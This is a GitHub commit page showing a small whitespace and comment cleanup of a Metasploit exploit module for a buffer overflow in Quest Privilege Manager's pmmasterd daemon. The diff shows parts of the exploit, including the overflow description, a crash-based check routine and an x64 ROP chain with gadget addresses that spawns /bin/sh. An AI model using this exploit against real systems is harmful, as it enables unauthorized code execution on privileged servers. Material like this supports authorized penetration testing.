Skip to content

Commit 5e42dde

Browse files
committed
msftidy clean up
1 parent 374d780 commit 5e42dde

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

modules/exploits/linux/misc/quest_pmmasterd_bof.rb

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@ def initialize(info = {})
1717
This modules exploits a buffer overflow in the Quest Privilege Manager,
1818
a software used to integrate Active Directory with Linux and Unix systems.
1919
The vulnerability exists in the pmmasterd daemon, and can only triggered when
20-
the host has been configured as a policy server ( Privilege Manager for Unix
20+
the host has been configured as a policy server ( Privilege Manager for Unix
2121
or Quest Sudo Plugin). A buffer overflow condition exists when handling
2222
requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
2323
controlled by the attacker. This module only works against version < 6.0.0-27.
@@ -43,7 +43,7 @@ def initialize(info = {})
4343
},
4444
'Arch' => ARCH_CMD,
4545
'Platform' => 'unix',
46-
'Targets' =>
46+
'Targets' =>
4747
[
4848
['Quest Privilege Manager pmmasterd 6.0.0-27 x64',
4949
{
@@ -67,12 +67,12 @@ def initialize(info = {})
6767
register_options( [ Opt::CPORT(rand(1024))], self.class )
6868
end
6969

70-
#definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog
70+
#definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog
7171
def check
7272
unless self.respond_to?(target[:check], true)
7373
fail_with(Failure::NoTarget, "Invalid target specified")
7474
end
75-
75+
7676
return self.send(target[:check])
7777
end
7878

@@ -149,10 +149,10 @@ def exploit_x64
149149
0x4FA215, # /bin/sh
150150
0x40a99e, # pop rsi ; ret
151151
0, # argv @rsi
152-
0x40c1a0, # pop rax, ret
152+
0x40c1a0, # pop rax, ret
153153
0, # envp @rax
154154
0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret
155-
0xcacc013, # padd
155+
0xcacc013, # padding
156156
0x408a98, # execve,
157157
0
158158
].pack("Q*")

0 commit comments

Comments
 (0)